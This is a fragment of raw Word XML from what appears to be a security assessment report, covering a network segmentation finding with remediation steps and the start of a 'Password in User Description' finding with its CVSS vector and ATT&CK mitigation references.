          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">l damage. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74FF9EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If a single host is vulnerable, an attacker can </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74FF9EAA">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74FF9EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74FF9EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>infect</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74FF9EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all other systems on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2C0A4848" w14:textId="114F74C2">
      <w:p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0D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="3A5BE816" w14:textId="7C6B215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491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="51AC53F9" w14:textId="4CDF36C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N/A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5E7B62A6" w14:textId="3ED8F5D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491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="18D328BF" w14:textId="12E9D9B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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="09DEFB4B" w14:textId="48C878D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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="1B8E32F6" w14:textId="17760556">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Implement Network Segmentation to isolate publicly accessible applications from critical systems that are needed for the cruise’s operational functionality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="7FF40356" w14:textId="2244DFAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Apply least privileged network access to only allow required communications between machines to take place</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="32CEA9E6" w14:textId="1C9CDD1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Regularly audit segmentation controls through network scans and </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0D491E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reviews. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="15C3EB63" w14:textId="547C381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491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="2AF913BC" w14:textId="481A1F4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491E33">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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="2E01FCD0" w14:textId="03AD6E9C">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c2bce7bec04f4936">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D491E33">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Nordlayer - Network Segmentation Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="6DF79DAD" w14:textId="5FD2B89E">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ea4a5239df4a4889">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D491E33">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Splunk - Guide to Network Segmentation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="62CB7536" w14:textId="0DA95B9C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6CDF0220" w14:textId="3EDB34D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D23B725" w:rsidP="0D325B6E" w:rsidRDefault="0D23B725" w14:paraId="3047B4C8" w14:textId="5ED289DD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc766316715" w:id="1790617532"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D23B725">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D23B725">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">H1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C49A0C3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password in User Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1790617532"/>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1"/>
        <w:gridCol w:w="1591"/>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="4335"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="346F5F96">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BA48B7" w14:textId="748B9F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90E4CD" w14:textId="280C295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2A17C6" w14:textId="5D16081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2271F3A1">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BCA3A0" w14:textId="78904DC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BC08BE8" w14:textId="02CD7B1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E43E739" w14:textId="3A617CBC">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8.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="741D502D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>6</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33B1804" w14:textId="783E0567">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0BB7C9E4">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366391" w14:textId="15BE6BE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D2F763A" w14:textId="69A6E32A">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2B91537"/>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D5C5D37"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4D8A1C41">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4B38829" w14:textId="46F9B8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023C9DF" w:rsidP="0D325B6E" w:rsidRDefault="6023C9DF" w14:paraId="4FE9DC7B" w14:textId="5DBC9380">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L" r:id="R14ff5634b443479a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</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AC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>L</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AT</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N</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PR</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N</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UI</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N</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VC</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H</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</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H</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>A</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H</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S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</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L</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SI</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L</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SA</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6023C9DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>L</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="75747A66">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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7A0D2B" w14:textId="0DAC1F2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7EC904" w14:textId="2F9CEDC8">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13FE3EA" w:rsidP="0D325B6E" w:rsidRDefault="413FE3EA" w14:paraId="6FD67778" w14:textId="2184DA97">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rfc5d64e518b94b92">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="413FE3EA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T155: Credentials from Password Stores</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1AD0F26E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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60D6BAC"/>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D14FC2C" w14:textId="7E636C06">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B82E4E1" w:rsidP="0D325B6E" w:rsidRDefault="0B82E4E1" w14:paraId="5D1299FD" w14:textId="612E400F">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1b2b531d632141fc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0B82E4E1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="23A201CF" w:rsidP="0D325B6E" w:rsidRDefault="23A201CF" w14:paraId="00DA574B" w14:textId="45D406DF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R52634a9b49e64db4">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="23A201CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="718D6B62">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8F2AC4" w14:textId="31749C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7E1FEEC" w14:textId="0879A465">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6F0A3C0F" w14:textId="082E4309">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="250E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="4905A96E" w14:textId="0DF60E4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704CD4E" w:rsidP="0D325B6E" w:rsidRDefault="5704CD4E" w14:paraId="58C0D280" w14:textId="59EF6AF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704CD4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The password for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5704CD4E">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5704CD4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exposed in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A8573E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A8573E1">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0AE7A367">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">user’s account </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A8573E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">description </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C5259AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C5259AD">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0D325B6E" w:rsidR="469828C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23E7FEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="323E7FEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an insecure</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="323E7FEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> method of password storage, allowing an unauthorized user to view credentials of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F8F4517">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="323E7FEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="78BBF3A0" w14:textId="08E371A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50E01CC" w:rsidP="0D325B6E" w:rsidRDefault="250E01CC" w14:paraId="172A186A" w14:textId="365FA6C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DE4360B" w:rsidP="0D325B6E" w:rsidRDefault="7DE4360B" w14:paraId="23C118A7" w14:textId="47548DC8">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 xml:space="preserve">Having access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DE4360B">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user’s</w:t>
      </w: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cleartext</w:t>
      </w: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 allows the attacker to impersonate the user and potentially access </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28EC1915">
        <w:rPr>
